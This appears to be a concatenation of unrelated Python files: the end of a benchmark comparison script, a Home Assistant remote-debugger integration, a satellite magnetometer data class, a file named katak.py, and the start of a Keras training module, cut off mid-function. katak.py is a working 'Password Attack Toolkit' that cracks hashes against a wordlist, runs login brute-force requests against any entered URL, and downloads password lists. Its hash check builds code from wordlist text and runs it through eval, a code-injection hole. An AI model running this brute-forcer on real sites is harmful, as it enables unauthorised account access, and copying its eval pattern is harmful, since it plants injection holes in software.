while tryCnt < MAXTRY:
it += 1
suspects = get_suspects()
if len(suspects) != last_suspect_number:
last_suspect_number = len(suspects)
last_unchanged_iter = it
if (len(suspects) == 0 or it - last_unchanged_iter >= TERM):
break
print "Number of suspects at iteration %d: %d" % (it, len(suspects))
threadRunner = ThreadRunner(args)
for j in range(1, max(1, args.threads / 2) + 1):
run(args, threadRunner, args.a, args.nano_a,
args.arg_a + suspects_arg(suspects), -j)
run(args, threadRunner, args.b, args.nano_b,
args.arg_b + suspects_arg(suspects), -j)
tryCnt += 1
threadRunner.wait()
suspects = get_suspects()
if len(suspects) == 0:
print ("%s and %s does not seem to have significant " + \
"performance differences.") % (args.a, args.b)
else:
suspects.sort(key = regression)
print "%s (compared to %s) is likely" % (args.a, args.b)
for suspect in suspects:
r = regression(suspect)
if r < 1:
print "\033[31m %s slower in %s\033[0m" % \
(format_r(1/r), suspect)
else:
print "\033[32m %s faster in %s\033[0m" % \
(format_r(r), suspect)
with open("%s/bench_%s_%s.json" % (args.outdir, args.a, args.b), 'w') as f:
results = {}
for bench in timesA:
r = regression(bench) if bench in suspects else 1.0
results[bench] = {
args.config: {
"signed_regression": normalize_r(r),
"lower_quantile_ms": get_lower_upper(timesA[bench])[0] * 1e-6,
"upper_quantile_ms": get_lower_upper(timesA[bench])[1] * 1e-6,
"options": {
# TODO(liyuqian): let ab.py call nanobench with --outResultsFile so
# nanobench could generate the json for us that's exactly the same
# as that being used by perf bots. Currently, we cannot guarantee
# that bench is the name (e.g., bench may have additional resolution
# information appended after name).
"name": bench
}
}
}
output = {"results": results}
if args.githash:
output["gitHash"] = args.githash
if args.keys:
keys = {}
for i in range(len(args.keys) / 2):
keys[args.keys[i * 2]] = args.keys[i * 2 + 1]
output["key"] = keys
f.write(json.dumps(output, indent=4))
print ("\033[36mJSON results available in %s\033[0m" % f.name)
with open("%s/bench_%s_%s.csv" % (args.outdir, args.a, args.b), 'w') as out:
out.write(("bench, significant?, raw regresion, " +
"%(A)s quantile (ns), %(B)s quantile (ns), " +
"%(A)s (ns), %(B)s (ns)\n") % {'A': args.a, 'B': args.b})
for bench in suspects + timesA.keys():
if (bench not in timesA or bench not in timesB):
continue
ta = timesA[bench]
tb = timesB[bench]
out.write(
"%s, %s, %f, " % (bench, bench in suspects, regression(bench)) +
' '.join(map(str, get_lower_upper(ta))) + ", " +
' '.join(map(str, get_lower_upper(tb))) + ", " +
("%s, %s\n" % (' '.join(map(str, ta)), ' '.join(map(str, tb))))
)
print (("\033[36m" +
"Compared %d benches. " +
"%d of them seem to be significantly differrent." +
"\033[0m") %
(len([x for x in timesA if x in timesB]), len(suspects)))
print ("\033[36mPlease see detailed bench results in %s\033[0m" %
out.name)
if __name__ == "__main__":
try:
test()
except Exception as e:
print e
print HELP
traceback.print_exc()
raise e
|
__init__.py
|
"""The Remote Python Debugger integration."""
from asyncio import Event
import logging
from threading import Thread
from typing import Optional
import debugpy
import voluptuous as vol
from homeassistant.const import CONF_HOST, CONF_PORT
from homeassistant.core import HomeAssistant, ServiceCall
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.service import async_register_admin_service
from homeassistant.helpers.typing import ConfigType
DOMAIN = "debugpy"
CONF_WAIT = "wait"
CONF_START = "start"
SERVICE_START = "start"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_HOST, default="0.0.0.0"): cv.string,
vol.Optional(CONF_PORT, default=5678): cv.port,
vol.Optional(CONF_START, default=True): cv.boolean,
vol.Optional(CONF_WAIT, default=False): cv.boolean,
}
)
},
extra=vol.ALLOW_EXTRA,
)
_LOGGER = logging.getLogger(__name__)
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the Remote Python Debugger component."""
conf = config[DOMAIN]
async def debug_start(
call: Optional[ServiceCall] = None, *, wait: bool = True
) -> None:
"""Start the debugger."""
debugpy.listen((conf[CONF_HOST], conf[CONF_PORT]))
wait = conf[CONF_WAIT]
if wait:
_LOGGER.warning(
"Waiting for remote debug connection on %s:%s",
conf[CONF_HOST],
conf[CONF_PORT],
)
ready = Event()
def waitfor():
debugpy.wait_for_client()
hass.loop.call_soon_threadsafe(ready.set)
Thread(target=waitfor).start()
await ready.wait()
else:
_LOGGER.warning(
"Listening for remote debug connection on %s:%s",
conf[CONF_HOST],
conf[CONF_PORT],
)
async_register_admin_service(
hass, DOMAIN, SERVICE_START, debug_start, schema=vol.Schema({})
)
# If set to start the debugger on startup, do so
if conf[CONF_START]:
await debug_start(wait=conf[CONF_WAIT])
return True
|
MagnetometerData.py
|
from .TimeSeries import TimeSeries, generateTimeSeries
from .DataSet import DataSet, DataSet_3D
from .DataSet_1D import DataSet_1D
from threading import Thread
import numpy as np
from numpy import logical_or, logical_and
from ai import cdas
class MagnetometerData():
"""Class providing a high level api for data import and processing"""
def __init__(self):
self.magneticField: DataSet_3D = None
"""The magnetic field at the satellite"""
self.position: DataSet_3D = None
"""The position of the satellite"""
self.meanField: DataSet_3D = None
"""The mean magnetic field after a rolling average"""
self.magneticFieldMeanFieldCoordinates: DataSet_3D = None
"""The magnetic field in mean field align coordinates"""
self.peemIdentifyMagnetosheath: DataSet = None
"""Required information for removal of magnetosheath
``keys: 'density','velocity_x','flux_x',flux_y'`` """
def _importAsync(self,funcs,startDatetime,endDatetime,*args) -> None:
""" Runs the CDAS imports defined in ``funcs`` asyncronously.
eg.
::
# User defines each of these methods for data from a particular satellite
funcs = (self._importCdasMagneticField,self._importCdasPosition,self._importCdasPeem)
self._importAsync(funcs,startDatetime,endDatetime,*args)
:param funcs:
Tuple of functions to execute. Each function should be of the form
``func(startDatetime,endDatetime,*args) -> None``. Any imported data
should be written to a class attribute.
.. Warning::
These functions should not read data from the class or modify the same attributes
as there is no prevention of a race condition. The functions are run simulataneously
using ``threading`` library.
:param startDatetime:
Start of data range as ``datetime.datetime`` or ``numpy.datetime64``
:param endDatetime:
End of data range as ``datetime.datetime`` or ``numpy.datetime64``
:param \*args:
Arbitrary arguments to be passed to the functions.
"""
arguments = (startDatetime,endDatetime,*args)
fetchers = []
for func in funcs:
fetch = Thread(target=func,args=arguments)
fetch.start()
fetchers.append(fetch)
for fetch in fetchers:
fetch.join()
def fillLessThanRadius(self,radiusInEarthRadii,const=0) -> None:
"""Fills all values in the magnetic field with ``const`` when the radius is below the
specified value.
"""
assert(self.position.timeSeries == self.magneticField.timeSeries)
radiusMask = self.position.data["radius"] < radiusInEarthRadii
self.magneticField.fillFlagged(radiusMask,const)
def convertToMeanFieldCoordinates(self) -> None:
""" Converts the magnetic field data in :attr:`magneticField` to mean field coordinates,
saving the output in :attr:`magneticFieldMeanFieldCoordinates`.
.. warning::
:attr:`meanField` must be specified and contain a 3D dataset with the mean
magnetic field.
:attr:`magneticField` must be specified
"""
assert(self.position.timeSeries == self.magneticField.timeSeries)
assert(self.magneticField.timeSeries == self.meanField.timeSeries)
fieldUnitVector = self.meanField.copy()
fieldUnitVector.makeUnitVector()
earthUnitVector = -(self.position.copy())
earthUnitVector.makeUnitVector()
polUnitVector = fieldUnitVector.cross(earthUnitVector)
polUnitVector.makeUnitVector()
torUnitVector = fieldUnitVector.cross(polUnitVector)
torUnitVector.makeUnitVector()
self.magneticFieldMeanFieldCoordinates = self.magneticField.coordinateTransform(
fieldUnitVector,
polUnitVector,
torUnitVector
)
def removeMagnetosheath(self) -> None:
"""Removes portions of magnetic field data while the satellite is in the magnetosheath.
:attr:`peemIdentifyMagnetosheath` must be specified, otherwise no action is taken.
"""
if self.peemIdentifyMagnetosheath is None:
return None
fluxX = self.peemIdentifyMagnetosheath.data['flux_x']
fluxY = self.peemIdentifyMagnetosheath.data['flux_y']
perpFlux = (fluxX**2 + fluxY**2)**(1/2)
density = self.peemIdentifyMagnetosheath.data['density']
velocityX = self.peemIdentifyMagnetosheath.data['velocity_x']
removeSheathFlags = logical_and(
(self.position.data["radius"] > 8),
logical_or(
(density > 10),
logical_or(
(velocityX < -200),
(perpFlux > 2e7)
)
)
)
self.magneticField.fillFlagged(removeSheathFlags)
def _interpolateReference(self, refTimeSeries: TimeSeries) -> None:
"""Removes duplicate times, then interpolates data sets :attr:`magneticField`,
:attr:`position` and :attr:`peemIdentifyMagnetosheath` to match the specified time series,
if the data sets are not None."""
for x in (
self.magneticField,
self.position,
self.peemIdentifyMagnetosheath,
):
if x is not None:
x.removeDuplicateTimes()
x.interpolateReference(refTimeSeries)
def _importCdasItemWithExceptions(self,
cdasArgs: tuple,
timeSeriesKey: str,
targetKeys: dict,
returnClassType: type = DataSet,
):
"""Imports cdas data for the given ``cdasArgs``, extracting a dataset.
:param tuple cdasArgs:
Arguments for data to get, as specified for ``ai.cdas.get_data()``.
(str dataview, str dataset, datetime startTime, datetime stopTime, list str variables)
:param str timeSeriesKey: The key that the times are refered to as in CDAS data return
:param dict targetKeys:
Dictionary where its values are the keys in CDAs data to include in the data set, and
its keys are the keys that should be used to reference these within the data set.
:param type returnClassType:
Class used to construct the returned data set, eg. :class:`DataSet`, :class:`DataSet_3D`
"""
try:
data = cdas.get_data(*cdasArgs,progress=False)
except ValueError:
raise CdasImportError.CdasUnspecifedMissingDataError
if data is None:
raise CdasImportError.CdasNoDataReturnedError
timeSeries = TimeSeries(data[timeSeriesKey])
selecetedData = {}
for key, cdasKey in targetKeys.items():
try:
d = data[cdasKey]
except KeyError:
raise CdasImportError.CdasKeyMissingError(f"Key not found:",cdasKey)
selecetedData[key] = d
return returnClassType(timeSeries,selecetedData)
class THEMISdata(MagnetometerData):
def interpolate(self,spacingInSeconds=3) -> None:
"""Interpolates data sets :attr:`magneticField`, :attr:`position` and
:attr:`peemIdentifyMagnetosheath` to the specified spacing, if they are not None.
A default spacing of 3s is chossen for THEMIS data. This is slightly smaller than the mean
sample spacing in the raw magnetometer data of ~3.17 s. Using a consistent value aids in
establishing the correspondence between frequencies in sonified audio and the raw data.
"""
refTimeSeries = generateTimeSeries(
self.magneticField.timeSeries.getStart(),
self.magneticField.timeSeries.getEnd(),
spacing=np.timedelta64(spacingInSeconds,'s')
)
self._interpolateReference(refTimeSeries)
def importCDAS(self,startDatetime,endDatetime,satellite="D") -> None:
""" Imports magnetic field, position, radial distance and peem data for the designated
THEMIS satellite and datetime range.
The possible satellite letters are: "A", "B", "C", "D" or "E".
See also: :meth:`MagnetometerData._importAsync`
"""
funcs = (self._importCdasMagneticField,self._importCdasPosition,self._importCdasPeem)
self._importAsync(funcs,startDatetime,endDatetime,satellite)
def _importCdasPosition(self, startDatetime, endDatetime, satellite) -> None:
cdasArgs = (
'sp_phys',
f'TH{satellite.upper()}_OR_SSC',
startDatetime,
endDatetime,
['XYZ_GSM','RADIUS'],
)
timeSeriesKey = "EPOCH"
targetKeys = {
0: 'X', 1: 'Y', 2: 'Z', 'radius': "RADIUS"
}
self.position = self._importCdasItemWithExceptions(
cdasArgs,timeSeriesKey,targetKeys,DataSet_3D
)
def _importCdasMagneticField(self, startDatetime, endDatetime, satellite) -> None:
cdasArgs = (
'sp_phys',
f'TH{satellite.upper()}_L2_FGM',
startDatetime,
endDatetime,
[f'th{satellite.lower()}_fgs_gsmQ']
)
timeSeriesKey = "UT"
targetKeys = {
0: f"BX_FGS-{satellite.upper()}",
1: f"BY_FGS-{satellite.upper()}",
2: f"BZ_FGS-{satellite.upper()}"
}
self.magneticField = self._importCdasItemWithExceptions(
cdasArgs,timeSeriesKey,targetKeys,DataSet_3D
)
def _importCdasPeem(self,startDatetime,endDatetime,satellite) -> None:
cdasArgs = (
'sp_phys',
f'TH{satellite.upper()}_L2_MOM',
startDatetime,
endDatetime,
[
f'th{satellite.lower()}_peem_density',
f'th{satellite.lower()}_peem_velocity_gsm',
f'th{satellite.lower()}_peem_flux'
]
)
timeSeriesKey = "UT"
targetKeys = {
'density': f"N_ELEC_MOM_ESA-{satellite.upper()}",
'velocity_x': f'VX_ELEC_GSM_MOM_ESA-{satellite.upper()}',
'flux_x': f'FX_ELEC_MOM_ESA-{satellite.upper()}',
'flux_y': f'FY_ELEC_MOM_ESA-{satellite.upper()}',
}
self.peemIdentifyMagnetosheath = self._importCdasItemWithExceptions(
cdasArgs,timeSeriesKey,targetKeys,DataSet
)
def defaultProcessing(self,
removeMagnetosheath=False,
minRadius=4,
allowSkipMagnetosheathRemovalIfInsufficientData = True
) -> None:
"""Performs a standard processing procedure on THEMIS data.
:param removeMagnetosheath: Whether to remove data while in the magnetosheath
:param minRadius: Radius in earth radii below which to remove magnetic field data
"""
self.interpolate()
self.magneticField.constrainAbsoluteValue(400)
self.meanField = self.magneticField.runningAverage(timeWindow=np.timedelta64(35,"m"))
self.magneticField = self.magneticField - self.meanField
self.fillLessThanRadius(minRadius)
if removeMagnetosheath:
self.removeMagnetosheath()
self.convertToMeanFieldCoordinates()
self.magneticFieldMeanFieldCoordinates.fillNaN()
class CdasImportError(Exception):
class CdasNoDataReturnedError(Exception):
pass
class CdasKeyMissingError(Exception):
pass
class CdasUnspecifedMissingDataError(Exception):
pass
|
katak.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
import time
import hashlib
import requests
import threading
import progressbar
class hash_kill:
class TypeError(Exception):
def __init__(self):
Exception.__init__(self, "Its not supported algorithms!")
def __init__(self, hash):
self.hash = hash
self.type = self.detect()
if self.type in "md5 sha1 sha224 sha256 sha384 sha512":self.kill()
else:print "[!] Something went error..."
def detect(self):
if len(self.hash) == 32:return "md5"
elif len(self.hash) == 40:return "sha1"
elif len(self.hash) == 56:return "sha224"
elif len(self.hash) == 64:return "sha256"
elif len(self.hash) == 96:return "sha384"
elif len(self.hash) == 128:return "sha512"
else:raise self.TypeError()
def kill(self):
print "[+] Hash type:",self.type
wordlist_ = open("password.txt", 'r').readlines()
progress = progressbar.ProgressBar()
print "[+] Cracking..."
for word in progress(wordlist_):
if self.hash != eval('hashlib.{}("{}").hexdigest()'.format(self.type, word.strip())):pass
else:print "\n[+] Password Found:",word;break;print "[!] Done.\n";time.sleep(1.5);main()
print "\n[!] Done.\n"
time.sleep(1.5)
main()
class brute_force:
def __init__(self, url, params, wordlist, match_word, method, thread=None, timeout=None):
self.url = url
self.params = params
self.wordlist = wordlist
self.match_word = match_word
self.method = method
if thread:
self.thread = thread
self.timeout = None
else:
self.thread = False
if timeout:self.timeout = timeout
else:self.timeout = 1
self.bruteForce()
def withThread(self):
def post(self):
for word in open(self.wordlist).read().split("\n"):
params = {}
sys.stdout.write(u"\u001b[1000D[*] Trying pass {}".format(word))
sys.stdout.flush()
params.update({self.params.split("&")[0].split("=")[0]:self.params.split("&")[0].split("=")[1],self.params.split("&")[1].replace("=",""):word})
response = requests.post(self.url, data=params).text
if self.match_word not in response:pass
else:print "\n[+] You have successfully logged in.";print "[+] Matched word: {}".format(self.match_word);break
print "[!] Done.\n"
def get(self):
for word in open(self.wordlist).read().split("\n"):
sys.stdout.write(u"\u001b[1000D[*] Trying pass {}".format(word))
sys.stdout.flush()
response = requests.get(self.url+"?"+self.params).text
if self.match_word not in response:pass
else:print "\n[+] You have successfully logged in.";print "[+] Match word: {}".format(self.match_word);break
print "[!] Done.\n"
if self.method == "get":
t = threading.Thread(target=get, args=(self,))
elif self.method == "post":
t = threading.Thread(target=post, args=(self,))
else:
t = threading.Thread(target=get, args=(self,))
t.start()
def withNoThread(self):
def post(self):
for word in open(self.wordlist).read().split("\n"):
params = {}
sys.stdout.write(u"\u001b[1000D[*] Trying pass {}".format(word))
sys.stdout.flush()
params.update({self.params.split("&")[0].split("=")[0]:self.params.split("&")[0].split("=")[1],self.params.split("&")[1].replace("=",""):word})
response = requests.post(self.url, data=params).text
if self.match_word not in response:pass
else:print "\n[+] You have successfully logged in.";print "[+] Matched word: {}".format(self.match_word);break
time.sleep(self.timeout)
print "[!] Done.\n"
def get(self):
for word in open(self.wordlist).read().split("\n"):
sys.stdout.write(u"\u001b[1000D[*] Trying pass {}".format(word))
sys.stdout.flush()
response = requests.get(self.url+"?"+self.params).text
if self.match_word not in response:pass
else:print "\n[+] You have successfully logged in.";print "[+] Matched word: {}".format(self.match_word);break
time.sleep(self.timeout)
print "[!] Done.\n"
if self.method == "get":get(self)
elif self.method == "post":post(self)
else:get(self)
def bruteForce(self):
if self.thread != False:self.withThread()
else:self.withNoThread()
class download:
class NetworkError(Exception):
def __init__(self):
Exception.__init__(self, "Network is unreachable!")
def __init__(self, url):
self.url = url
self.wordlist()
def wordlist(self):
try:__wordlist__=requests.get(self.url).text;open("password.txt","w").write(__wordlist__);print "[+] Downloaded: password.txt\n[+] String loaded: {}".format(len(open("password.txt").read()))
except:raise self.NetworkError()
def main():
opt = raw_input("[h]ash-killer [b]rute-force [w]ordlist [a]bout: ")
if opt.lower() == "h":
hash_kill(raw_input("[*] enter hash: "))
elif opt.lower() == "b":
url = raw_input("[*] enter url: ")
params = raw_input("[*] enter params: ")
wordlist = raw_input("[*] wordlist: ")
match_word = raw_input("[*] match word: ")
method = raw_input("[*] method: ")
thread = raw_input("[*] thread (y/n): ")
if thread.lower() == "y":thread=True
elif thread.lower() == "n":thread=None
else:thread=None
if thread != True:
timeout = raw_input("[*] timeout (default: 1s): ")
if timeout != "":pass
else:timeout=1
else:
timeout=None
brute_force(url, params, wordlist, match_word, method, thread, timeout)
main()
elif opt.lower() == "w":
opt = raw_input("[d]ownload [u]pdate [b]ack: ")
if opt == "d":
url = raw_input("[*] enter url: ")
download(url)
time.sleep(1.5)
main()
elif opt == "u":
try:
__wordlist__ = requests.get("https://raw.githubusercontent.com/Gameye98/Gameye98.github.io/master/wordlist/password.txt").text
open("password.txt","w").write(__wordlist__)
print "[+] Updated: password.txt"
print "[+] String loaded: {}".format(len(open("password.txt").read()))
time.sleep(1.5)
main()
except:print "[!] NetworkError: Network is unreachable";main()
elif opt == "b":
main()
elif opt.lower() == "a":
print __about__
main()
else:
main()
__banner__ = """
Katak (v0.0.1-dev) by DedSecTL...
=================================
* Hash Killer 80%
* Hash Detection 75%
* Brute Force 90%
* Big Wordlist 100%
* Support Threading 100%
"""
__about__ = """
About
-----
Katak - Password Attack Toolkit
Author : DedSecTL <dtlily>
Version : 0.0.1
Team : BlackHole Security
Date : Sun Oct 28 21:08:48 2018
Telegram : @dtlily
Line : dtl.lily
"""
if __name__ == '__main__':
try:
print __banner__
main()
except KeyboardInterrupt:
sys.exit()
|
training.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import losses
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
from ..legacy import interfaces
def _standardize_input_data(data, names, shapes=None,
check_batch_axis=True,
exception_prefix=''):
"""Normalizes inputs and targets provided by users.
Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
# Arguments
data: User-provided input data (polymorphic).
names: List of expected array names.
shapes: Optional list of expected array shapes.
check_batch_axis: Boolean; whether to check that
the batch axis of the arrays matches the expected
value found in `shapes`.
exception_prefix: String prefix used for exception formatting.
# Returns
List of standardized input arrays (one array per model input).
# Raises
ValueError: in case of improperly formatted user-provided data.
"""
if not names:
return []
if data is None:
return [None for _ in range(len(names))]
if isinstance(data, dict):
arrays = []
for name in names:
if name not in data:
raise ValueError('No data provided for "' +
name + '". Need data for each key in: ' +
str(names))
arrays.append(data[name])
elif isinstance(data, list):
if len(data) != len(names):
if data and hasattr(data[0], 'shape'):
raise ValueError('Error when checking model ' +
exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise ValueError(
'Error when checking model ' +
exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise TypeError('Error when checking model ' +
exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) > 1:
# Case: model expects multiple inputs but only received
# a single Numpy array.
raise ValueError('The model expects ' + str(len(names)) +
exception_prefix +
' arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# Make arrays at least 2D.
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# Check shapes compatibility.
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise ValueError('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_axis:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise ValueError(
'Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
def _standardize_sample_or_class_weights(x_weight, output_names, weight_type):
"""Maps `sample_weight` or `class_weight` to model outputs.
# Arguments
x_weight: User-provided `sample_weight` or `class_weight` argument.
output_names: List of output names (strings) in the model.
weight_type: A string used purely for exception printing.
# Returns
A list of `sample_weight` or `class_weight` where there are exactly
one element per model output.
# Raises
ValueError: In case of invalid user-provided argument.
"""
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if isinstance(x_weight, list) and len(x_weight) == 1:
return x_weight
if isinstance(x_weight, dict) and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if isinstance(x_weight, list):
if len(x_weight) != len(output_names):
raise ValueError('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if isinstance(x_weight, dict):
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise TypeError('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list of a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def _standardize_class_weights(class_weight, output_names):
return _standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def _standardize_sample_weights(sample_weight, output_names):
return _standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def _check_array_lengths(inputs, targets, weights):
"""Does user input validation for numpy arrays.
# Arguments
inputs: list of Numpy arrays of inputs.
targets: list of Numpy arrays of targets.
weights: list of Numpy arrays of sample weights.
# Raises
ValueError: in case of incorrectly formatted data.
"""
x_lengths = [x.shape[0] for x in inputs]
y_lengths = [y.shape[0] for y in targets]
w_lengths = [w.shape[0] for w in weights]
set_x = set(x_lengths)
if len(set_x) > 1:
raise ValueError('All input arrays (x) should have '
'the same number of samples. Got array shapes: ' +
str([x.shape for x in inputs]))
set_y = set(y_lengths)
if len(set_y) > 1:
raise ValueError('All target arrays (y) should have '
'the same number of samples. Got array shapes: ' +
str([y.shape for y in targets]))
set_w = set(w_lengths)
if len(set_w) > 1:
raise ValueError('All sample_weight arrays should have '
'the same number of samples. Got array shapes: ' +
str([w.shape for w in weights]))
if set_x and set_y and list(set_x)[0] != list(set_y)[0]:
raise ValueError('Input arrays should have '
'the same number of samples as target arrays. '
'Found ' + str(list(set_x)[0]) + ' input samples '
'and ' + str(list(set_y)[0]) + ' target samples.')
if set_y and set_w and list(set_y)[0] != list(set_w)[0]:
raise ValueError('Sample_weight arrays should have '
'the same number of samples as target arrays. Got ' +
str(list(set_y)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def _check_loss_and_target_compatibility(targets, loss_fns, output_shapes):
"""Does validation on the compatiblity of targets and loss functions.
This helps prevent users from using loss functions incorrectly.
# Arguments
targets: list of Numpy arrays of targets.
loss_fns: list of loss functions.
output_shapes: list of shapes of model outputs.
# Raises
ValueError: if a loss function or target array
is incompatible with an output.
"""
key_losses = {'mean_square_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, loss_fns, output_shapes):
if loss is None:
continue
if loss.__name__ == 'categorical_crossentropy':
if y.shape[-1] == 1:
raise ValueError(
'You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses:
for target_dim, out_dim in zip(y.shape[1:], shape[1:]):
if out_dim is not None and target_dim != out_dim:
raise ValueError(
'A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def _collect_metrics(metrics, output_names):
"""Maps metric functions to model outputs.
# Arguments
metrics: a list or dict of metric functions.
output_names: a list of the names (strings) of model outputs.
# Returns
A list (one entry per model output) of lists of metric functions.
For instance, if the model has 2 outputs, and for the first output
we want to compute "binary_accuracy" and "binary_crossentropy",
and just "binary_accuracy" for the second output,
the list would look like:
`[[binary_accuracy, binary_crossentropy], [binary_accuracy]]`
# Raises
TypeError: if an incorrect type is passed for the `metrics` argument.
"""
if not metrics:
return [[] for _ in output_names]
if isinstance(metrics, list):
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif isinstance(metrics, dict):
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if not isinstance(output_metrics, list):
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise TypeError('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def _batch_shuffle(index_array, batch_size):
"""Shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
# Arguments
index_array: array of indices to be shuffled.
batch_size: integer.
# Returns
The `index_array` array, shuffled in a batch-wise fashion.
"""
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def _make_batches(size, batch_size):
"""Returns a list of batch indices (tuples of indices).
# Arguments
size: Integer, total size of the data to slice into batches.
batch_size: Integer, batch size.
# Returns
A list of tuples of array indices.
"""
num_batches = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, num_batches)]
def _slice_arrays(arrays, start=None, stop=None):
"""Slice an array or list of arrays.
This takes an array-like, or a list of
array-likes, and outputs:
- arrays[start:stop] if `arrays` is an array-like
- [x[start:stop] for x in arrays] if `arrays` is a list
Can also work on list/array of indices: `_slice_arrays(x, indices)`
# Arguments
arrays: Single array or list of arrays.
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
# Returns
A slice of the array(s).
"""
if isinstance(arrays, list):
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in arrays]
else:
return [x[start:stop] for x in arrays]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return arrays[start]
else:
return arrays[start:stop]
def _weighted_masked_objective(fn):
"""Adds support for masking and sample-weighting to an objective function.
It transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
# Arguments
fn: The objective function to wrap,
with signature `fn(y_true, y_pred)`.
# Returns
A function with signature `fn(y_true, y_pred, weights, mask)`.
"""
if fn is None:
return None
def weighted(y_true, y_pred, weights, mask=None):
"""Wrapper function.
# Arguments
y_true: `y_true` argument of `fn`.
y_pred: `y_pred` argument of `fn`.
weights: Weights tensor.
mask: Mask tensor.
# Returns
Scalar tensor.
"""
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def _masked_objective(fn):
"""Adds support for masking to an objective function.
It transforms an objective function `fn(y_true, y_pred)`
into a cost-masked objective function
`fn(y_true, y_pred, mask)`.
# Arguments
fn: The objective function to wrap,
with signature `fn(y_true, y_pred)`.
# Returns
A function with signature `fn(y_true, y_pred, mask)`.
"""
def masked(y_true, y_pred, mask=None):
"""Wrapper function.
# Arguments
y_true: `y_true` argument of `fn`.
y_pred: `y_pred` argument of `fn`.
mask: Mask tensor.
# Returns
Scalar tensor.
"""
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
